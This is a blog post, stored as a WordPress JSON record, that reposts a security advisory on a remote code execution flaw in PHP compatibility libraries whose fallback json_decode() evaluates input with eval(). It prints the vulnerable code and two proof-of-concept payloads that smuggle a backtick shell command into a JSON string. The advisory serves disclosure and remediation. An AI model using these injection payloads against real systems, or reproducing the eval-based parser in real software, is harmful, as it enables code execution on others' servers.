{"id":26371,"date":"2022-07-01T19:38:45","date_gmt":"2022-07-01T15:38:45","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/167683\/jahx221-exec.txt"},"modified":"2022-07-04T12:06:12","modified_gmt":"2022-07-04T07:36:12","slug":"php-library-remote-code-execution","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/php-library-remote-code-execution\/","title":{"rendered":"PHP Library Remote Code Execution"},"content":{"rendered":"

JAHx221 – RCE in copy\/pasted PHP compat libraries, json_decode function
\n===============================================================================
\nSeveral PHP compatability libraries contain a potential remote code
\nexecution
\nflaw in their `json_decode()` function based on having copy pasted existing
\nvulnerable code.<\/p>\n

Identifiers
\n—————————————
\n* JAHx221 – http:\/\/www.justanotherhacker.com\/advisories\/JAHx221.txt<\/p>\n

Affected components
\n—————————————
\n* WassUp Realtime analytics wordpress plugin\/compat library –
\nhttps:\/\/wordpress.org\/plugins\/wassup\/
\n* AjaXplorer Core –
\nhttps:\/\/pydio.com\/en\/community\/releases\/pydio-core\/ajaxplorer-core-503-released
\n* FlexoCMS – https:\/\/github.com\/flexocms\/flexo1.source
\n* Various code –
\nhttps:\/\/github.com\/search?p=6&q=if+function_exists+json_decode+eval+%24out&type=Code
\n* compat_functions.php – http:\/\/techfromhel.com<\/p>\n

Description
\n—————————————
\nThis appears to date back to a compatability library published in 2010 and
\nappears in several code bases, with no, or a few variations.<\/p>\n

The vulnerable code generally share the following characteristic:
\n* The json_decode function is declared if it does not exist
\n* some str_replace occurs to transform the json representation to PHP
\n* eval($out)<\/p>\n

Since `eval()` is turing complete, it is generally considered unsafe to use
\nit
\non user controlled or user influenced data, however it is unclear if
\npractical
\nexploitation would be possible due to the likely presence of an existing
\njson_decode function.<\/p>\n

“`php
\n\/**
\n* compat_functions.php
\n* Description: Emulate some functions from PHP 5.2+ and Wordpress 2.6+ for
\n* backwards compatibility with PHP 4.3+ and Wordpress 2.2+, respectively
\n* @author: Helene D. <http:\/\/techfromhel.com>
\n* @version: 0.3 – 2010-09-13
\n* @since Wassup 1.8
\n*\/<\/p>\n

\/**
\n* Convert simple JSON data into a PHP object (default) or associative
\n* array. Emulates ‘json_decode’ function from PHP 5.2+
\n* @author: Helene Duncker <http:\/\/techfromhel.com>
\n* @param string,boolean
\n* @return (array or object)
\n*\/
\nif (!function_exists(‘json_decode’)) {
\nfunction json_decode($json,$to_array=false) {
\n$x=false;
\nif (!empty($json) && strpos($json,'{“‘)!==false) {
\n$out =
\n‘$x=’.str_replace(array(‘{‘,'”:’,’}’),array(‘array(‘,'”=>’,’)’),$json);
\neval($out.’;’);
\nif (!$to_array) $x = (object) $x;
\n}
\nreturn $x;
\n} \/\/end function json_decode
\n}
\n“`<\/p>\n

Proof of Concept
\n—————————————
\nThe eval can be exploited a number of ways, both via full or partial
\ncontrol of the json string:
\n“`php
\n\/* Payload
\n`id`;\/\/{”
\n*\/
\njson_decode(‘`id`;\/\/{“‘);
\n“`
\nor partially controlled content:
\n“`php
\n\/* Payload
\n{“key”:”value”);echo `id`;\/\/”}
\n*\/
\njson_decode(‘{“key”:”value”);echo `id`;\/\/”}’);<\/p>\n

“`<\/p>\n

Credit
\n—————————————
\nEldar “Wireghoul” Marcussen<\/p>\n

Solution
\n—————————————
\nEnsure json_decode is present as a native function for your PHP
\ninstallation.<\/p>\n","protected":false},"excerpt":{"rendered":"

JAHx221 – RCE in copy\/pasted PHP compat libraries, json_decode function =============================================================================== Several PHP compatability libraries contain a potential remote code execution flaw in their `json_decode()` function based on having copy pasted existing vulnerable code. Identifiers ————————————— * JAHx221 – http:\/\/www.justanotherhacker.com\/advisories\/JAHx221.txt Affected components ————————————— * WassUp Realtime analytics wordpress plugin\/compat library – https:\/\/wordpress.org\/plugins\/wassup\/ * AjaXplorer Core …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-26371","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/26371","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=26371"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/26371\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=26371"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=26371"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=26371"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}